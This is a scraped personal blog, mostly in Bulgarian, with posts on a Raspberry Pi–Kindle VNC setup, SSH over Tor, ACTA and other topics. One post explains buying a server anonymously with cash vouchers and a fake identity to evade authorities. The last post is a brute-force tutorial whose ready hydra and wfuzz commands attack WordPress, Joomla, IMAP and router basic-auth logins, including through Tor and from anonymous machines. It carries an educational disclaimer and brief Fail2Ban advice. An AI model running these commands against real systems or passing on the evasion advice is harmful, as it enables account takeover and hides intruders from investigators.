My new laptop = RaspberryPi + Kindle 4 NT instead of hdmi monitor
Kindle is awesome. This is the second device I use the most. There are days that my eyes bleed from 12 hours front of the computer. But my curiosity is bigger than the pain. Here comes the Kindle with its soft for the eyes e-ink. In fact, the Kindle is the only device I can use outside. I'm planning a sunny summer, but I have lots of projects, so the way to combine work with pleasure is to create myself a gadget that works good outdoors. After numerous tests I finally came with this device:
My initial plan was to use the Kindle as VNC client, and the Raspberry for VNC server. I have to create a script that starts the VNC client and server on both devices. I've choose to use /etc/network/interfaces as event trigger - the Kindle is connected to the Rspberry with usb network (keep reading). Now when I connect the Kindle via USB cable to the Raspberry a script starts VNC server and VNC client.
I want to share you my steps.
KINDLE
- JailBrake the device - was easy with that http://www.mobileread.com/forums/showthread.php?t=191158
- Configure UsbNetwork - was easy with that http://www.mobileread.com/forums/showthread.php?t=88004
- Setup VNC client - was easy with this http://www.mobileread.com/forums/showthread.php?t=150434
- Configure SSH keys for passwordless login
- Prevent Kindle from "phoning" home - was easy with http://blitiri.com.ar/p/other/kindle/
RASPBERRY PI
- Install RaspbianPi from http://www.raspbian.org/
- Install x11vnc - apt-get install x11vnc
We are going to use x11vnc server, because I wanted to use keyboard and mouse. I will attach them to the Pi, but I want to "see" them on the Kindle's screen. My research introduced me to x11vnc.
Turn on VNC Client on Kindle, Turn on VNC server on Pi
/etc/network/interfaces/
iface usb0 inet static
address 192.168.10.1
netmask 255.255.255.0
broadcast 192.168.10.255
up iptables -I INPUT -s 192.168.10.2 -j ACCEPT
up /home/pi/is_online
pi@raspberrypi ~ $ cat /home/pi/is_online
ping -c 1 -t 1 192.168.10.2 > /dev/null;
if [ $? -eq 0 ]; then
echo "${kindle_ip} is up";
su pi -c 'x11vnc -scale 800x600 -display :0 &'
sleep 2
su - pi -c "ssh -n -f root@192.168.10.2 \"sh -c '/mnt/us/kindlevncviewer/kvncviewer.sh 192.168.10.1:0'\" &"
else
echo "kindle is down";
fi
Conclusion
Its an awesome device for coding python on a sunny summer day. I'm also using 7'' android tablet as screen, again as a VNC client, when I need colors :--) I'm planning to share the wifi connection from the Kindle to the PI. That way I won't need external USB wifi. I need to work on the design too :--) But its possible to code in a sunny day :)
rip, Aaron
"access to knowledge and access to justice have become all about access to money, and Aaron tried to change that..." rip
проблеми със звука при debian amd64
Sound Problem
If you have sound problems you may be missing libpulse.You can install it with:
# apt-get install libpulse0:i386
източник debian wiki
SSH през Tor
Поствам това тук, защото някой пък ще ми потребява и няма да мога да се прибера у дома :) Живеем в NAT-ed свят.
Пуснал съм си SSH през TOR
HiddenServiceDir /var/lib/tor/ssh/ HiddenServicePort 22 127.0.0.1:22
И ако ми потребва да се "прибирам у дома" от някоя машина:
~/.ssh/config
Host *.onion ProxyCommand connect -R remote -5 -S 127.0.0.1:9050 %h %p
HideMyAss
HideMyAss е готина VPN услуга, с над 14к IPта. Сигурен съм, че освен за скриване на самоличността може да се ползва и за нещо друго. Идеи?
w000t w0000t
Hellou, Inernet Citizens,
Не съм умрял, не съм и офлайн :) С този фейсбук и другите тъпи социалки, мижавите блогове като моя, си изгубиха смисъла. Ще драсна някое-друго туториалче, само да се застуди..
Поздрави
Ново: търсене в архив от новини в gramophon.com
Най-накрая се наканих и направих нещо ново за сайтчето, което отварям всеки ден по няколко пъти. Въпреки навлизането на социалните мрежи, Грамофон си остана моят портал в интернет. Отварям го още от сутринта, с кафето, и не спирам да го проверявам цял ден. От там научавам новинките, от там следя постовете на българските блогъри, от там се ориентирам с какво да се облека, а напоследък от там правя и изследвания на архив новини. Последното стана възможно след като инсталирах и конфигурирах Сфинкс сърч. Така успях да направя доста бързо търсене в до сега агрегираните новини и статии - около 1,300,000 (и растат всеки ден..). Чрез търсенето попадам на много интересни статии, които по някаква причина съм пропуснал.
ГЕРБ, БСП, НДСВ, СДС, ДСБ, Бойко Борисов, Сергей Станишев, Уорлик, Русия, Америка, Иран
#ACTA
Споразумението #ACTA, което Америка иска да прокара в Европа е прясно доказателство, че не трябва да се вярва и партнира сляпо на нито една "Велика" сила. Дори тя да е заела позиция на Световна полиция. Преди поемахме от изток, сега поемаме от запад. Чак сега разбирам какво са имали предвид анонимните творци, когато нарисуваха паметника в София и написаха "В крак с времето". Преди сме строели малумни паметници сляпо вярващи на "братят-освободитлели". Днес, в крак с времето, пак се заробваме - този път чрез "търговски споразумения" от Запад. Дано не се окаже, че Западът обича цензурата, досиетата и донасянето повече от Изтока.
Защо си мисля, че американците нарочно ни показаха интернет, накараха ни да станем зависими от него, а сега искат да ни го дръпнат...? Зависимости! И преди са действали, като гледам действат и сега. И въпреки че Бого е започнал борбата преди 2-3 години, аз и доста мои познати чак сега разбират какъв автогол си вкарваме, ако оставим да мине споразумението #ACTA. Защо хората не се интересуват навременно от правата си, а се бунтуват чак като им ги вземат. Не е никак футуристично, ако кажем че скоро може да живеем като герои от роман на Оруел...
Оптимистичното е че, ако до преди 3 дена нямаше нито една медия, която да е писала по темата, от три дена насам все пак започна да се пише за това. Е, някои политици се метнаха на вълната на недоволството, но да се надяваме, че ще ги запомним до другите избори. А там ще ги накажем поименно.
Tова е България
Препоръчвам това видео на всеки, който има проблеми с самочувствието си на българин.
Как да си купим анонимен сървър?
Ако властите или конкуренцията Ви дишат във врата, или поне си мислите че го правят, можете да прибегнете до закупуването на анонимен сървър, някъде из интернет, през който да прекарате трафика си (VPN). Така ще ги забавите малко, докато разберат какво се случва. Практически VPN се явява една дълбоко заустена тръба в интернет, от която излиза Вашия трафик. Нещо като тази. Шегата на страна! Ако публикувате в интернет през истинското си IP чувствителна информация е въпрос на време да се разбере истинската Ви самоличност. Ако имате така нареченото статично IP, което си е само за Вас - това е елементарна задача. За да скриете самоличността можете да си сетъпнете VPN сървър някъде из света, който да се явява Вашата трибуна към интернет. Трафикът между него и Вас е криптиран, т.е. нещо като метална тръба до него. Ако в момента трафикът Ви е излизал от Варна, България, а след това трафика Ви ще излиза от Франция, за пример. Също като тръбата на Златни пясъци :)
Но ако платите за сървъра си с кредитната карта, дали въобще има смисъл да го сетъпвате? Вие вече сте осведомили, който трябва, че вирутално се премествате във Франция. И пак могат да Ви идентифицират.
Затова Ви препоръчвам да си купите анонимно сървър от Mr. Zhang, но в никакъв случай да не плащате чрез кредитна карта. Най-добрият начин е плащане в кеш, но трудно ще стигнете до Китай, за да му платите на този човек. Затова в белите страни са измислени така наречените предплатени кредитни карти. В България няма да намерите такива. Но във Франция, Испания, Португалия има. Сигурен съм че имате приятел там. Изпратете му пари и му заръчайте да ви купи ваучър Ukash. Инструктирайте го да плати в КЕШ, а след това да Ви изпрати номерата на ваучъра. С него отивате при Mr. Zhang и си избирате машина. Може би не е нужно да Ви напомням, че е хубаво да се представите на Mr. Zhang като измислено лице, макар трудно да стигне Интерпол до него в Китай. Но Вие се подсигурете.
Същото важи и за покупка на анонимен домейн. До сега обаче нямам практика да съм купувал и бих приел Вашите съвети от къде е най-сигурно да се пазарува!
Как да влезем взлом (bruteforce) Wordpress/Joomla/Other web apps
Дори и най-перфектно и сигурно написаният сайт може да бъде компрометиран от глупостта на задклавиатурното устройство. Колкото и да сте си играли да осигурявате някой администраторски панел, в случай че сте дали парола на секретарката Незабравка, то Вие сте оставили дупка в сигурността на апликацията. Обикновено тези съсловия, но не само те, избират лесни и кратки паролки. Дали ще е рожденна дата, дали ще е кратко име с цифри 123 накрая, а може би елементарното 123456, то Вашият админ панел е отворен към света. Точно както няма ключалка направена от човек, която да не може да се разбие от човек, така е и с паролите. Но при разбиването на пароли по-големи от 10 символа вече си говорим за много ресурси и време. Парола от 6 цифри е елементарна за разбиване, а 6 до 8 букви и цифри - е реалистично. Затова избирайте сериозни и трудни пароли. И карайте потребителите си да го правят, иначе е било безсмислено да пишете качествен и сигурен код.
Една от стъпките при одит на сигурност на уеб сайт е проверката за слаби пароли. Много от уеб апликациите нямат защита срещу ботове (каптча или забрана след n на брой опити), което улеснява нашата задача при изпробване на речници с пароли. Всичко е автомагично, нали не мислите че ще го правим на ръка?
Инструментите, които Ви трябват, за разбиване на уеб апликации са crunch и wfuzz или hydra. Също така Ви трябва и анонимна машина (една или повече) от която да правите пробите. С crunch можете да генерирате речници с пароли. За него има страхотно ръководство тук. Wfuzz и Hydra имат интересни способности, документацията им е доста дискриптивна, но няма твърде много публикувани примери. Затова аз пускам моите записки тук, за да ги ползвате като начало на Вашето изследване. Не смятам да описвам документацията на тези програмки, а само да Ви дам примери за ползването им. Тези инструменти можете да ги намерите готови за използване в тази дистрибуция.
Как да влезем взлом (bruteforce) в Wordpress
hydra -l admin -P /path/to/wordlist -s 80 wordpress_url_here http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=1:ERROR"
python wfuzz.py -t 1 -s 10 -c -z file -f /path/to/wordlist --hc 404 --hc 200 -d "log=admin&pwd=FUZZ&submit=1" http://wordpress_url_here/wp-login.php -V
Как да влезем взлом (bruteforce) в Joomla
python wfuzz.py -t 1 -s 10 -c -z file -f /path/to/wordlist -d "usrname=admin&pass=FUZZ&submit=1" http://joomla_url_here/administrator/
Как да влзем взлом (bruteforce) в IMAP сървър
hydra -l user@emaila.com -P /path/to/wordlist server_host_here imap
Как да разбием basic auth (.htaccess & .htpasswd)
hydra -l admin -P wordlist/mywordlist/mixalpha-numeric-all-space_6 192.168.0.1 http-head /
(полезно при разбиване на модеми, рутери, аксес пойнтове)
В повечето случаи когато разбивате уеб апликация ще получавате код 200 при грешна парола, и 301 при успешна двойка. Така ще се ориентирате, коя парола е съвпаднала. Във всеки случай, трябва да знаете как работи системата за аутентикация преди да започнете да я разбивате.
Как да ползваме wfuzz през Tor
Изключително бавно е! Но все пак трябва да го отбележа като възможен сценарии.
python wfuzz.py -x SOCKS5 -p localhost:8118 -t 1 -s 10 -c -z file,/path/to/wordlist --hc 404 --hc 200 -d "log=admin&pwd=FUZZ&wp-submit=1" http://host/wordpress/wp-login.php
python wfuzz.py -x SOCKS5 -p localhost:8118 -t 15 -s 3 -c -z file,/path/to/wordlist --hc 404 --hc 200 -d "log=admin&pwd=FUZZ&wp-submit=1" -o html http://host/wp-login.php 2> file_to_print.html
!! АВТОРЪТ НЕ НОСИ НИКАКВА ОТГОВОРНОСТ ЗА ДЕЙСТВИЯТА НА ТРЕТИ ЛИЦА! Информацията тук е предоставена единствено за образователни и защитни цели! Хората трябва да знаят колко е лесно, за да се пазят по-добре! По-добре ще е да я ползвате за одит, а не за разбиване на паролата на рутера на съседа, нали? НЕ НОСЯ ОТГОВОРНОСТ!
Може би ще е добре да кажа и как се защитава Wordpress от взлом: С някой плугин от този тип. А imap, web, ssh и други демони могат да се защитят с Fail2Ban.
